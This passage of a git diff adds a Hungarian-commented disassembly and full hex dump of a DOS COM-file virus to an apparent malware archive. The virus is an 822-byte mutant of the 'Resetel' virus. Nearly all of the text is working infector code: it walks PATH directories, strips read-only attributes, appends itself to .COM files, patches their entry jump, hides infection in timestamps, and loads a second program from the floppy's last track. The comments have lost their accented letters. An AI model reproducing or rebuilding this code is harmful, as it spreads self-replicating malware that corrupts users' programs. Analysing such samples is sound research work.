visszalltsa +02E8 33C0 XOR AX,AX ;Regiszterek nullzsa +02EA 33DB XOR BX,BX +02EC 33D2 XOR DX,DX +02EE 33F6 XOR SI,SI +02F0 BF0001 MOV DI,0100 +02F3 57 PUSH DI ;0100 a stackre +02F4 33FF XOR DI,DI +02F6 C2FFFF RET FFFF ;100-on folytatdik a vezrls + ;SP-- {Hogy minek?} + + + + ;----------------------------------------- + ; ADAT TERLET + ;----------------------------------------- + + + ;Ide mutat (02F9-re) a vrus elejn DX, ksbb SI,BX. + +02F9 ERE_DTA_OFS DW (?) ;[SI+00] Eredeti DTA cme +02FB ERE_DTA_SEG DW (?) ;[SI+02] + +02FD ERE_TIME DW (?) ;[SI+04] A file eredeti ideje, +02FF ERE_DATE DW (?) ;[SI+06] dtuma, +0301 ERE_ATTR DW (?) ;[SI+08] attributtuma + +0303 ERE_KEZD DB 3 DUP (?) ;[SI+0A] + ;A file eredeti els 3 byteja. + + ;A kvetkez 3 byteon lesz az a 3 byte , amit a vrus egy meg- + ;fertzend file elejre fog rni. + +0306 B_JMP DB E9 ;[SI+0D] + ;JMP gpikdja +0307 CIM_JMP DW (?) ;Eltols (JMP operandusa) + +0309 KERES_STR DB '*.COM',0 ;[SI+10] + ;Ezt a stringet msolja a + ;FILE_NEV_MUT cmre + +030F PATH_MUT DW (?) ;[SI+16] + ;Hol a kvetkez aldirectory neve + ;az environmenten. + +0311 FILE_NEV_MUT DW (?) ;[SI+18] + ;Az tmsolt aldirectory mg mu- + ;tat. + ;Azt mutatja , hogy hova kell a + ;keressi stringet(*.COM), majd a + ;file nevt msolni a FILE_PATH- + ;on bell ahhoz, hogy teljes utat + ;kapjunk. + +0313 STR_PATH DB 'PATH=' ;[SI+1A] Ezt a stringet keresi az + ;environment terleten. + +0318 FILE_PATH DB 40 DUP (?);[SI+1F] + ;Itt lesz majd a keressi string + ;s a fertzend file neve ttal + ;egytt. + + + ;Ide mutat a DTA. Ezt a terletet fogja a DOS a file adataival + ;feltlteni. + +0358 ENTRY DB 15 DUP (?);Fenntartott [SI+5F] +036D ENT_ATTR DB (?) ;Attributtum [SI+74] +036E ENT_IDO DW (?) ;Keletkezs ideje [SI+75] +0370 ENT_DATUM DW (?) ;Keletkezs dtuma [SI+77] +0372 ENT_HOSSZ DW (?) ;Als sz [SI+79] +0374 DW (?) ;Fels sz [SI+7B] +0376 ENT_NEV DB 0D DUP (?);Megtallt file neve [SI+7D] + +0383 RESET DB EA,F0,FF,00,F0 ;JMP F000:FFF0 [SI+8A] + ;Nem hasznlja + + ;---------------------------------------------------- + ; A Tltgett behz rsz + ;---------------------------------------------------- + + +0388 50 PUSH AX ;Regiszterek elmentse +0389 53 PUSH BX +038A 51 PUSH CX +038B 52 PUSH DX +038C 06 PUSH ES +038D 1E PUSH DS +038E 57 PUSH DI +038F 56 PUSH SI +0390 E80000 CALL 0393 ;Lebuks !! (/g) +0393 5B POP BX ;BX=0393 + + ;A: BOOT beolvassa/Tltget lekrdezse + +0394 BEA55A MOV SI,5AA5 ;Tltget lekrdezse +0397 BFAA55 MOV DI,55AA +039A 0E PUSH CS +039B 07 POP ES +039C 81C3E803 ADD BX,03E8 ;BX=077B +03A0 81FBE803 CMP BX,03E8 +03A4 7303 JNB 03A9 +03A6 E98200 JMP 042B ;Ha nincs elg szabad memria a szegmensen +03A9 53 PUSH BX +03AA B80102 MOV AX,0201 ;A:BOOT beolvassa +03AD BA0000 MOV DX,0000 +03B0 B90100 MOV CX,0001 +03B3 CD13 INT 13 +03B5 5B POP BX +03B6 7308 JNB 03C0 +03B8 80FC06 CMP AH,06 ;Ha lemezcsere volt, az nem hiba +03BB 74EC JZ 03A9 +03BD EB6C JMP 042B ;Valdi hiba->vge +03BF 90 NOP +03C0 81FE5AA5 CMP SI,A55A +03C4 7465 JZ 042B ;Vge, ha a Tltget mr a memriban van + + ;Van-e elg szabad memria a Tltget beolvasshoz + +03C6 8CC8 MOV AX,CS +03C8 050010 ADD AX,1000 +03CB 53 PUSH BX +03CC 50 PUSH AX +03CD CD12 INT 12 ;Max mem. +03CF BB4000 MOV BX,0040 +03D2 F7E3 MUL BX ;AX-ben a memria tetejnek szegmense +03D4 2D0010 SUB AX,1000 ;legalbb 4Kb kell a Tltgetnek +03D7 8BD8 MOV BX,AX +03D9 58 POP AX ;CS+1000 +03DA 3BD8 CMP BX,AX +03DC 7304 JNB 03E2 +03DE 5B POP BX +03DF EB4A JMP 042B ;Vge, ha nincs elg szabad memria +03E1 90 NOP + + ; A lemez utls svjnak megkeresse + +03E2 5B POP BX ;BX=077B +03E3 8EC0 MOV ES,AX ;Max mem-1000 +03E5 2E CS: +03E6 8B4718 MOV AX,[BX+18] ;Sv hossza +03E9 2E CS: +03EA 8B4F1A MOV CX,[BX+1A] ;Oldalak szma +03ED F7E1 MUL CX +03EF 8BC8 MOV CX,AX ;Egy cilinder nagysga +03F1 2E CS: +03F2 8B4713 MOV AX,[BX+13] ;Szektorok szma +03F5 BA0000 MOV DX,0000 +03F8 F7F1 DIV CX ;Osztva a cilinder nagysgval AL-ben a sv + + ; Az utls sv beolvassa + +03FA 81EBE803 SUB BX,03E8 ;BX=0393 +03FE 53 PUSH BX +03FF 8AE8 MOV CH,AL ;40/80-dik sv +0401 B101 MOV CL,01 +0403 BB0001 MOV BX,0100 ;ES:BX-re olvas ! +0406 BA0000 MOV DX,0000 +0409 B80802 MOV AX,0208 ;8 szektor beolvassa +040C CD13 INT 13 +040E 5B POP BX +040F 721A JB 042B ;Hibnl vge + + ; Ha a Tltgett tall, elindtja + +0411 53 PUSH BX +0412 BB0001 MOV BX,0100 +0415 26 ES: +0416 8B07 MOV AX,[BX] +0418 3D5224 CMP AX,2452 ;Azonost +041B 5B POP BX +041C 750D JNZ 042B ;Ha nem Tltget +041E 8BC3 MOV AX,BX +0420 059800 ADD AX,0098 ;AX=042B (A visszatrsre mutat) +0423 0E PUSH CS +0424 50 PUSH AX +0425 B80A01 MOV AX,010A ;Tltget belpsi pontja +0428 06 PUSH ES +0429 50 PUSH AX +042A CB RETF + + ; Visszatrs + +042B 5E POP SI ;Regiszterek vissza +042C 5F POP DI +042D 1F POP DS +042E 07 POP ES +042F 5A POP DX +0430 59 POP CX +0431 5B POP BX +0432 58 POP AX +0433 C3 RET +0434 0000 DW 0000 ;??? + + + A vrus hexa dumpja : + + +0100 51 BA F9 02 FC 8B F2 81-C6 0A 00 BF 00 01 B9 03 Q............... +0110 00 F3 A4 8B F2 B4 30 CD-21 3C 00 75 03 E9 C7 01 ......0.!<.u.... +0120 06 B4 2F CD 21 89 9C 00-00 8C 84 02 00 E8 58 02 ../.!.........X. +0130 07 BA 5F 00 90 03 D6 B4-1A CD 21 06 56 8E 06 2C .._.......!.V.., +0140 00 BF 00 00 5E 56 81 C6-1A 00 AC B9 00 80 F2 AE ....^V.......... +0150 B9 04 00 AC AE 75 ED E2-FA 5E 07 89 BC 16 00 8B .....u...^...... +0160 FE 81 C7 1F 00 8B DE 81-C6 1F 00 8B FE EB 3A 83 ..............:. +0170 BC 16 00 00 75 03 E9 60-01 1E 56 26 8E 1E 2C 00 ....u..`..V&..,. +0180 8B FE 26 8B B5 16 00 81-C7 1F 00 AC 3C 3B 74 0A ..&.........<;t. +0190 3C 00 74 03 AA EB F4 BE-00 00 5B 1F 89 B7 16 00 <.t.......[..... +01A0 80 7D FF 5C 74 03 B0 5C-AA 89 BF 18 00 8B F3 81 .}.\t..\........ +01B0 C6 10 00 B9 06 00 F3 A4-8B F3 B4 4E BA 1F 00 90 ...........N.... +01C0 03 D6 B9 03 00 CD 21 EB-04 B4 4F CD 21 73 02 EB ......!...O.!s.. +01D0 9E 8B 84 75 00 24 1F 3C-1F 74 EE 81 BC 79 00 00 ...u.$.<.t...y.. +01E0 FA 77 E6 83 BC 79 00 0A-72 DF 8B BC 18 00 56 81 .w...y..r.....V. +01F0 C6 7D 00 AC AA 3C 00 75-FA 5E B8 00 43 BA 1F 00 .}...<.u.^..C... +0200 90 03 D6 CD 21 89 8C 08-00 B8 01 43 81 E1 FE FF ....!......C.... +0210 BA 1F 00 90 03 D6 CD 21-B8 02 3D BA 1F 00 90 03 .......!..=..... +0220 D6 CD 21 73 03 E9 A2 00-8B D8 B8 00 57 CD 21 89 ..!s........W.!. +0230 8C 04 00 89 94 06 00 B4-2C CD 21 80 E6 07 EB 0D ........,.!..... +0240 90 B4 40 B9 05 00 8B D6-81 C2 8A 00 90 B4 3F B9 ..@...........?. +0250 03 00 BA 0A 00 90 03 D6-CD 21 72 55 3D 03 00 75 .........!rU=..u +0260 50 B8 02 42 B9 00 00 BA-00 00 CD 21 72 43 8B C8 P..B.......!rC.. +0270 2D 03 00 89 84 0E 00 81-C1 F9 02 8B FE 81 EF F7 -............... +0280 01 89 0D B4 40 B9 36 03-8B D6 81 EA F9 01 CD 21 ....@.6........! +0290 72 1F 3D 36 03 75 1A B8-00 42 B9 00 00 BA 00 00 r.=6.u...B...... +02A0 CD 21 72 0D B4 40 B9 03-00 8B D6 81 C2 0D 00 CD .!r..@.......... +02B0 21 8B 94 06 00 8B 8C 04-00 81 E1 E0 FF 81 C9 1F !............... +02C0 00 B8 01 57 CD 21 B4 3E-CD 21 B8 01 43 8B 8C 08 ...W.!.>.!..C... +02D0 00 BA 1F 00 90 03 D6 CD-21 1E B4 1A 8B 94 00 00 ........!....... +02E0 8E 9C 02 00 CD 21 1F 59-33 C0 33 DB 33 D2 33 F6 .....!.Y3.3.3.3. +02F0 BF 00 01 57 33 FF C2 FF-FF 80 00 57 0B 96 01 21 ...W3......W...! +0300 00 20 00 E9 00 00 E9 FD-0F 2A 2E 43 4F 4D 00 71 . .......*.COM.q +0310 07 21 07 50 41 54 48 3D-54 45 53 5A 54 2E 43 4F .!.PATH=TESZT.CO +0320 4D 00 4F 4D 00 20 20 20-20 20 20 20 20 20 20 20 M.OM. +0330 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20 +0340 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20 +0350 20 20 20 20 20 20 20 20-03 3F 3F 3F 3F 3F 3F 3F .??????? +0360 3F 43 4F 4D 03 03 00 4B-09 A1 7D 73 6F 20 96 01 ?COM...K..}so .. +0370 21 00 00 10 00 00 54 45-53 5A 54 2E 43 4F 4D 00 !.....TESZT.COM. +0380 4F 4D 00 EA F0 FF 00 F0-50 53 51 52 06 1E 57 56 OM......PSQR..WV +0390 E8 00 00 5B BE A5 5A BF-AA 55 0E 07 81 C3 E8 03 ...[..Z..U...... +03A0 81 FB E8 03 73 03 E9 82-00 53 B8 01 02 BA 00 00 ....s....S...... +03B0 B9 01 00 CD 13 5B 73 08-80 FC 06 74 EC EB 6C 90 .....[s....t..l. +03C0 81 FE 5A A5 74 65 8C C8-05 00 10 53 50 CD 12 BB ..Z.te.....SP... +03D0 40 00 F7 E3 2D 00 10 8B-D8 58 3B D8 73 04 5B EB @...-....X;.s.[. +03E0 4A 90 5B 8E C0 2E 8B 47-18 2E 8B 4F 1A F7 E1 8B J.[....G...O.... +03F0 C8 2E 8B 47 13 BA 00 00-F7 F1 81 EB E8 03 53 8A ...G..........S. +0400 E8 B1 01 BB 00 01 BA 00-00 B8 08 02 CD 13 5B 72 ..............[r +0410 1A 53 BB 00 01 26 8B 07-3D 52 24 5B 75 0D 8B C3 .S...&..=R$[u... +0420 05 98 00 0E 50 B8 0A 01-06 50 CB 5E 5F 1F 07 5A ....P....P.^_..Z +0430 59 5B 58 C3 00 00 Y[X... + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.v_822.lst b/MSDOS/Virus.MSDOS.Unknown.v_822.lst new file mode 100644 index 00000000..381cc2c0 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.v_822.lst @@ -0,0 +1,669 @@ + + + A Resetel vrus Tltget fle mutnsa + *************************************** + + +A Resetel vrussal teljes egszben megegyezik a fertz mechanizmus. +Eltekintve attl, hogy ez a mutns nem tesz tnkre fjlokat. Az adatterlet is +ugyanazon a cmen van, gy ugyangy lehet rtani, mint a Resetelt. A vltozs: +a vrus hossza 822 byte, minden indts utn az A:-rl megprblja beolvasni a +BOOT-ot, majd a 40/80-dik svot. Ha valamelyik Tltgetvel fertztt, akkor +elindtja a Tltgett ! + + + ;Ide (0100-ra) mutat a file elejrl az ugr utasts. + + ;Els feladat: az els 3 byte visszarsa az eredetire. + +0100 51 PUSH CX ;CX a stacken marad mindvgig. + ;A kvetkez utasts operandust ( jelen esetben 02F9-et ) + ;fertzskor lltja be , gy mindig a helyes cmre mutat. +0101 BAF902 MOV DX,02F9 ;Eredeti els 3 byte cme-10h +0104 FC CLD ;( ERE_DTA_OFS) +0105 8BF2 MOV SI,DX +0107 81C60A00 ADD SI,000A ;SI=offset ERE_KEZD +010B BF0001 MOV DI,0100 ;Program eleje +010E B90300 MOV CX,0003 ;3 byte +0111 F3 REPZ +0112 A4 MOVSB ;Az eredeti byteok visszalltsa + + + ;----------------------------------------- + ; Installcis rsz: + ;----------------------------------------- + + ;DOS verzi lekrdezse. 1.00-nl kisebb verzinl az eredeti + ;program futtatsa: ekkor a vrus nem mkdik. + +0113 8BF2 MOV SI,DX ;Ezutn SI-ben az adatterlet cme +0115 B430 MOV AH,30 +0117 CD21 INT 21 ;DOS verzi lekrdezse +0119 3C00 CMP AL,00 ;Csak 1.00-nl kisebbnl lp ki +011B 7503 JNZ 0120 +011D E9C701 JMP 02E7 ;Eredeti program futtatsa + + + ;Disk Transzfer Address lekrdezse, elmentse + +0120 06 PUSH ES +0121 B42F MOV AH,2F +0123 CD21 INT 21 ;DTA leolvassa (ES:BX), megrzse +0125 899C0000 MOV [SI+0000],BX ;ERE_DTA_OFS (02F9) +0129 8C840200 MOV [SI+0002],ES ;ERE_DTA_SEG (02FB) + + ;------------------------------------------------------- + ; A beiktatott behz rsz + ;------------------------------------------------------- + +012D E85802 CALL 0388 +0130 07 POP ES + + ;DTA belltsa ENTRY cmre (0358). Igy a FindFirst, FindNext + ;DOS funkcik ide fogjk msolni a file adatait (nevt,idejt, + ;hosszt,stb). + +0131 BA5F00 MOV DX,005F + ;{Valsznleg rgi assemblerrel rtk a vrust, ezrt van itt + ;egy NOP utasts.} +0134 90 NOP +0135 03D6 ADD DX,SI +0137 B41A MOV AH,1A +0139 CD21 INT 21 ;DTA lltsa DS:DX-re: ENTRY(0358) + + + ;A PATH-ok cmnek megkeresse. Ha az aktulis knyvtrban mr + ;mindegyik filet megfertzte , itt tajlja meg azoknak az al- + ;knyvtraknak a nevt , amelyekben mg megfertzend fileokat + ;tallhat. + +013B 06 PUSH ES +013C 56 PUSH SI +013D 8E062C00 MOV ES,[002C];Environment (krnyezet) segmense +0141 BF0000 MOV DI,0000 ;ES:DI fog a megfelel helyre + ;(a kvetkez directoryra) mutatni + + + ;A kvetkez rsz a PATH= szveget keresi meg az environment + ;terleten: + +0144 5E POP SI +0145 56 PUSH SI +0146 81C61A00 ADD SI,001A ;STR_PATH (0313) +014A AC LODSB ;AL=DS:[SI],SI++ +014B B90080 MOV CX,8000 ;max 32k az environment +014E F2 REPNZ +014F AE SCASB ;AL-ES:[DI] Megkeresi a kvetkez + ;'P' bett +0150 B90400 MOV CX,0004 ;Mg 4 bet azonostsa +0153 AC LODSB ;AL=DS:[SI],SI++ +0154 AE SCASB ;AL-ES:[DI],DI++ +0155 75ED JNZ 0144 ;Ugrs, ha a kvetkez 4 bet nem + ;egyezik (nem 'ATH=') +0157 E2FA LOOP 0153 +0159 5E POP SI ;ES:DI mutat az els PATH-ra +015A 07 POP ES +015B 89BC1600 MOV [SI+0016],DI ;PATH_MUT (030F) + + +015F 8BFE MOV DI,SI ;{Hogy ez minek ? Ksbb gyis +0161 81C71F00 ADD DI,001F ;fellrja} FILE_PATH (0318) +0165 8BDE MOV BX,SI ;Ezutn BX mutat az adatokra +0167 81C61F00 ADD SI,001F ;SI is a FILE_PATH-ra(0318) mutat +016B 8BFE MOV DI,SI ;{Az elbb mr bellitotta (?)} +016D EB3A JMP 01A9 + + + ;A kvetkez PATH-ban megadott aldirectoryt FILE_PATH-ra m- + ;solja. Igy a kvetkez fileokat mr ebben az aldirectoryban + ;fogja keresni. + +016F 83BC160000 CMP WORD PTR [SI+0016],+00 ;PATH_MUT (030F) +0174 7503 JNZ 0179 +0176 E96001 JMP 02D9 ;Ugrs, ha nincs tbb PATH aldir. + ;(mindet megfertte mr) +0179 1E PUSH DS +017A 56 PUSH SI +017B 26 ES: +017C 8E1E2C00 MOV DS,[002C] ;Environment segmense +0180 8BFE MOV DI,SI ;(02F9) +0182 26 ES: +0183 8BB51600 MOV SI,[DI+0016] ;PATH_MUT (030F) +0187 81C71F00 ADD DI,001F ;FILE_PATH cme (0318) +018B AC LODSB ;AL=DS:[SI] SI++ +018C 3C3B CMP AL,3B ;';' +018E 740A JZ 019A +0190 3C00 CMP AL,00 +0192 7403 JZ 0197 +0194 AA STOSB ;ES:[DI]:=AL DI++ +0195 EBF4 JMP 018B ;tmsols ';' vagy #0-ig + + ;#0-val zrult a PATH bejegyzs => nem lesz tbb +0197 BE0000 MOV SI,0000 +019A 5B POP BX ;Ezutn BX mutat az adatokra +019B 1F POP DS +019C 89B71600 MOV [BX+0016],SI ;PATH_MUT (030F) = 0 + ;( Nincs tbb PATH jelzs ) + + ;A kvetkez PATH-ban adott aldir. mr tmsolva. +01A0 807DFF5C CMP BYTE PTR [DI-01],5C +01A4 7403 JZ 01A6 ;Ugrs, ha az utls bet a '\' +01A6 B05C MOV AL,5C ;Egybknt '\' rs +01A8 AA STOSB ;ES:[DI]:=AL DI++ + + + + + ;Egy aldirectory kirtkelse . Elszr az aktulis , majd a + ;FILE_PATH -ra msolt aldirectory vgignzse, fertzs. + ;DI a FILE_PATH-ba rt aldirectory neve utni pozicira mutat. + + + ;A COM kiterjeszts fileok megkeresse: + +01A9 89BF1800 MOV [BX+0018],DI ;FILE_NEV_MUT (0311) + ;Ide kell majd a file nevt + ;msolni (az aldir. neve utn) +01AD 8BF3 MOV SI,BX ;(02F9) +01AF 81C61000 ADD SI,0010 ;KERES_STR (0309) +01B3 B90600 MOV CX,0006 ;6 bet tmsolsa ('*.COM',0) +01B6 F3 REPZ ;A PATH-ban megadott aldirectory +01B7 A4 MOVSB ;mg , gy teljes keressi utunk + ;lesz +01B8 8BF3 MOV SI,BX ;(02F9) +01BA B44E MOV AH,4E ;FIND FIRST ENTRY +01BC BA1F00 MOV DX,001F +01BF 90 NOP +01C0 03D6 ADD DX,SI ;FILE_PATH (0318) +01C2 B90300 MOV CX,0003 ;HIDDEN, READ ONLY +01C5 CD21 INT 21 ;Az els COM kiterjeszts file + ;megkeresse . A file adatait a DTA + ;ltal mutatott cmre (ENTRY 0358) + ;msolja. +01C7 EB04 JMP 01CD + + + ;Kvetkez COM file keresse (adatai ENTRY-re kerlnek). + +01C9 B44F MOV AH,4F ;FIND NEXT +01CB CD21 INT 21 +01CD 7302 JNB 01D1 +01CF EB9E JMP 016F ;Ha nem tall tbb COM filet : j + ;aldirt keres a PATH-ban + + + ;Mr tallt COM filet. Adataival az ENTRY fel van tltve.Ennek + ;a filenak az ellenrzse, fertzse kvetkezik. + + ;Annak ellenrzse , hogy a file megfertzhet-e (fertztt-e, + ;tl hossz-e, tl rvid-e) . Ha nem fertzhet visszaugrik j + ;fileokat keresni. + +01D1 8B847500 MOV AX,[SI+0075] ;ENT_IDO (036E) A file ideje +01D5 241F AND AL,1F +01D7 3C1F CMP AL,1F ;Ugrs, ha az als 5 bit 1-es: +01D9 74EE JZ 01C9 ;a file mr fertztt. +01DB 81BC790000FA CMP WORD PTR [SI+0079],FA00 ;ENT_HOSSZ (0372) +01E1 77E6 JA 01C9 ;Ugrs, ha file hossza nagyobb,mint + ;64000h (mr nem fr bele a vrus) +01E3 83BC79000A CMP WORD PTR [SI+0079],+0A ;ENT_HOSSZ (0372) +01E8 72DF JB 01C9 ;Ugrs, ha rvidebb 10h bytenl + + + ;----------------------------------------- + ; Megvan a kivlaszott file. + ;----------------------------------------- + + ;A file nevt az aldirectory neve utn kell msolni , hogy a + ;teljes t rendelkezsnkre lljon , gy majd meg tudja nyitni + ;a filet. +01EA 8BBC1800 MOV DI,[SI+0018] ;FILE_NEV_MUT (0311) Ide fogja +01EE 56 PUSH SI ;a file nevt msolni +01EF 81C67D00 ADD SI,007D ;ENT_NEV (0376) + +01F3 AC LODSB ;AL:=DS:[SI] SI++ +01F4 AA STOSB ;ES:[DI]:=AL DI++ (Msols) +01F5 3C00 CMP AL,00 ;Nvlezr 0-ig msol +01F7 75FA JNZ 01F3 +01F9 5E POP SI ;SI jra az adatokra mutat + + + ;A file egyes eredeti informciinak megrzse , hogy a fert- + ;zs ne tnjn fel. + + ;Az eredeti attributtum megrzse: + + ;{Fogalmam sincs mirt kell a file attributtumt mg egyszer + ;lekrdezni , amikor az ENTRY terleten megtallhat . Taln a + ;vrus rja nem tudta?} +01FA B80043 MOV AX,4300 ;File attributtumnak lekrdezse +01FD BA1F00 MOV DX,001F ;FILE_PATH ([SI+1F] 0318) +0200 90 NOP ;{piszok} +0201 03D6 ADD DX,SI ;DS:DX mutat a file tjra +0203 CD21 INT 21 ;CX-ben az attributtum +0205 898C0800 MOV [SI+0008],CX ;ERE_ATTR (0301) + + + ;A file rsvdelmnek trlse: + +0209 B80143 MOV AX,4301 ;File attributtumnak llitsa +020C 81E1FEFF AND CX,FFFE ;Read Only jelzs trlse +0210 BA1F00 MOV DX,001F ;{ Az elbb mr belltotta, minek +0213 90 NOP ;jra? } +0214 03D6 ADD DX,SI ;FILE_PATH (0318) +0216 CD21 INT 21 + + + ;File megnyitsa: + +0218 B8023D MOV AX,3D02 ;File megnyitsa rsra, olvassra +021B BA1F00 MOV DX,001F ;{Mg egyszer belltja!} +021E 90 NOP ;{piszok} +021F 03D6 ADD DX,SI ;FILE_PATH (0318) +0221 CD21 INT 21 +0223 7303 JNB 0228 +0225 E9A200 JMP 02CA ;Hibnl: nincs fertzs +0228 8BD8 MOV BX,AX ;Handle + + + ;A file eredeti (mostani) idejnek lekrdezse: + + ;{Ez is megtallhat lenne az ENTRY terleten!} +022A B80057 MOV AX,5700 ;Get Date & Time +022D CD21 INT 21 +022F 898C0400 MOV [SI+0004],CX ;ERE_TIME (02FD) +0233 89940600 MOV [SI+0006],DX ;ERE_DATE (02FF) + + + ;Annak eldntse , hogy a kivlasztott filet tnkretegye-e , + ;vagy megfertzze . Lekrdezi a jelenlegi idt , s ha msod- + ;perceinek szma 8-cal oszthat , akkor a filet resetelv te- + ;szi, egybknt pedig megfertzi. Igy az esetek 2/15-d rsz- + ;ben teszi csak tnkre a filet. + +0237 B42C MOV AH,2C ;A mostani id lekrdezse +0239 CD21 INT 21 +023B 80E607 AND DH,07 ;A msodpercek als 3 bitje +023E EB0D JMP 024D ;Fertzs +0240 90 NOP + + + ; Szemt a Reseletlbl + +0241 B440 MOV AH,40 +0243 B90500 MOV CX,0005 +0246 8BD6 MOV DX,SI +0248 81C28A00 ADD DX,008A +024C 90 NOP + + ;----------------------------------------- + ; Fertzs: + ;----------------------------------------- + + + ;Az eredeti file els 3 bytejnak megrzse , hogy ksbb mg + ;futtatni lehessen. +024D B43F MOV AH,3F ;Olvass filebl +024F B90300 MOV CX,0003 ;Az els 3 byte beolvassa +0252 BA0A00 MOV DX,000A +0255 90 NOP ;{piszok} +0256 03D6 ADD DX,SI ;ERE_KEZD (0303) +0258 CD21 INT 21 +025A 7255 JB 02B1 ;Hibnl vge +025C 3D0300 CMP AX,0003 +025F 7550 JNZ 02B1 ;Hibnl vge + + + ;File vgre lls, az j cmek kiszmtsa: + +0261 B80242 MOV AX,4202 ;File Pointer file vgre lltsa +0264 B90000 MOV CX,0000 +0267 BA0000 MOV DX,0000 +026A CD21 INT 21 +026C 7243 JB 02B1 ;{Itt nem nagyon lehet hiba!} + + + ;A file elejre irand JMP operandusnak kiszmtsa: + +026E 8BC8 MOV CX,AX ;AX-ben a file hossza +0270 2D0300 SUB AX,0003 ;AX-ben az eltols a JMP utasts- + ;hoz, ahhoz amit a file elejre fog + ;majd rni . Igy ez a JMP a file + ;mostani vge utni bytera fog mu- + ;tatni. +0273 89840E00 MOV [SI+000E],AX ;CIM_JMP (0307) + + + ;Az j fileon belli adatterlet cmnek kiszmtsa s bel- + ;ltsa: + +0277 81C1F902 ADD CX,02F9 ;CX az j fileon belli adatter- +027B 8BFE MOV DI,SI ;letre mutat. +027D 81EFF701 SUB DI,01F7 ;A vrus els utastsnak (MOV DX, + ;02F9) operandusnak cme. +0281 890D MOV [DI],CX ;Ide rja az adatterlet cmt + + + ;----------------------------------------- + ; A vrus hozzmsolja magt a filehoz: + ;----------------------------------------- + + ;(A filemutat a file vgre mutat.) +0283 B440 MOV AH,40 ;Irs fileba. +0285 B93603 MOV CX,0336 ;822 byte (a vrus hossza) +0288 8BD6 MOV DX,SI +028A 81EAF901 SUB DX,01F9 ;DX a vrus els bytejra mutat +028E CD21 INT 21 +0290 721F JB 02B1 ;Hibnl vge +0292 3D3603 CMP AX,0336 +0295 751A JNZ 02B1 ;Ha nem rta ki mind a 648 byteot + + + ;Az els 3 byte tlltsa, egy a file vgre mutat ugr uta- + ;stsra: + +0297 B80042 MOV AX,4200 ;A file pointer a file elejre! +029A B90000 MOV CX,0000 +029D BA0000 MOV DX,0000 +02A0 CD21 INT 21 +02A2 720D JB 02B1 ;{Itt sem lehet hiba!} + +02A4 B440 MOV AH,40 ;Irs fileba +02A6 B90300 MOV CX,0003 ;3 byte +02A9 8BD6 MOV DX,SI +02AB 81C20D00 ADD DX,000D ;B_JMP (0306) DX az ugr utastsra +02AF CD21 INT 21 ;mutat + + + ;Az eredeti id ( mr a fertzsjelzssel egytt ) visszall- + ;tsa: + +02B1 8B940600 MOV DX,[SI+0006] ;ERE_DATE (02FF) +02B5 8B8C0400 MOV CX,[SI+0004] ;ERE_TIME (027D) +02B9 81E1E0FF AND CX,FFE0 ;{Teljesen felesleges!} +02BD 81C91F00 OR CX,001F ;Mr volt fertzve jelzs +02C1 B80157 MOV AX,5701 ;Set Date & Time +02C4 CD21 INT 21 + + + ;A file lezrsa: + +02C6 B43E MOV AH,3E ;Close Handle +02C8 CD21 INT 21 + + + ;Az eredeti attributtum visszalltsa: + +02CA B80143 MOV AX,4301 ;Set File Attributtum +02CD 8B8C0800 MOV CX,[SI+0008] ;ERE_ATTR (0301) +02D1 BA1F00 MOV DX,001F +02D4 90 NOP +02D5 03D6 ADD DX,SI ;FILE_PATH (0318) +02D7 CD21 INT 21 + + + ;DTA visszalltsa az eredeti cmre: + +02D9 1E PUSH DS +02DA B41A MOV AH,1A ;Set DTA +02DC 8B940000 MOV DX,[SI+0000] ;ERE_DTA_OFS (02F9) +02E0 8E9C0200 MOV DS,[SI+0002] ;ERE_DTA_SEG (02FB) +02E4 CD21 INT 21 +02E6 1F POP DS + + + ;----------------------------------------- + ; Az eredeti program futtatsa: + ;----------------------------------------- + +02E7 59 POP CX ;CX visszalltsa +02E8 33C0 XOR AX,AX ;Regiszterek nullzsa +02EA 33DB XOR BX,BX +02EC 33D2 XOR DX,DX +02EE 33F6 XOR SI,SI +02F0 BF0001 MOV DI,0100 +02F3 57 PUSH DI ;0100 a stackre +02F4 33FF XOR DI,DI +02F6 C2FFFF RET FFFF ;100-on folytatdik a vezrls + ;SP-- {Hogy minek?} + + + + ;----------------------------------------- + ; ADAT TERLET + ;----------------------------------------- + + + ;Ide mutat (02F9-re) a vrus elejn DX, ksbb SI,BX. + +02F9 ERE_DTA_OFS DW (?) ;[SI+00] Eredeti DTA cme +02FB ERE_DTA_SEG DW (?) ;[SI+02] + +02FD ERE_TIME DW (?) ;[SI+04] A file eredeti ideje, +02FF ERE_DATE DW (?) ;[SI+06] dtuma, +0301 ERE_ATTR DW (?) ;[SI+08] attributtuma + +0303 ERE_KEZD DB 3 DUP (?) ;[SI+0A] + ;A file eredeti els 3 byteja. + + ;A kvetkez 3 byteon lesz az a 3 byte , amit a vrus egy meg- + ;fertzend file elejre fog rni. + +0306 B_JMP DB E9 ;[SI+0D] + ;JMP gpikdja +0307 CIM_JMP DW (?) ;Eltols (JMP operandusa) + +0309 KERES_STR DB '*.COM',0 ;[SI+10] + ;Ezt a stringet msolja a + ;FILE_NEV_MUT cmre + +030F PATH_MUT DW (?) ;[SI+16] + ;Hol a kvetkez aldirectory neve + ;az environmenten. + +0311 FILE_NEV_MUT DW (?) ;[SI+18] + ;Az tmsolt aldirectory mg mu- + ;tat. + ;Azt mutatja , hogy hova kell a + ;keressi stringet(*.COM), majd a + ;file nevt msolni a FILE_PATH- + ;on bell ahhoz, hogy teljes utat + ;kapjunk. + +0313 STR_PATH DB 'PATH=' ;[SI+1A] Ezt a stringet keresi az + ;environment terleten. + +0318 FILE_PATH DB 40 DUP (?);[SI+1F] + ;Itt lesz majd a keressi string + ;s a fertzend file neve ttal + ;egytt. + + + ;Ide mutat a DTA. Ezt a terletet fogja a DOS a file adataival + ;feltlteni. + +0358 ENTRY DB 15 DUP (?);Fenntartott [SI+5F] +036D ENT_ATTR DB (?) ;Attributtum [SI+74] +036E ENT_IDO DW (?) ;Keletkezs ideje [SI+75] +0370 ENT_DATUM DW (?) ;Keletkezs dtuma [SI+77] +0372 ENT_HOSSZ DW (?) ;Als sz [SI+79] +0374 DW (?) ;Fels sz [SI+7B] +0376 ENT_NEV DB 0D DUP (?);Megtallt file neve [SI+7D] + +0383 RESET DB EA,F0,FF,00,F0 ;JMP F000:FFF0 [SI+8A] + ;Nem hasznlja + + ;---------------------------------------------------- + ; A Tltgett behz rsz + ;---------------------------------------------------- + + +0388 50 PUSH AX ;Regiszterek 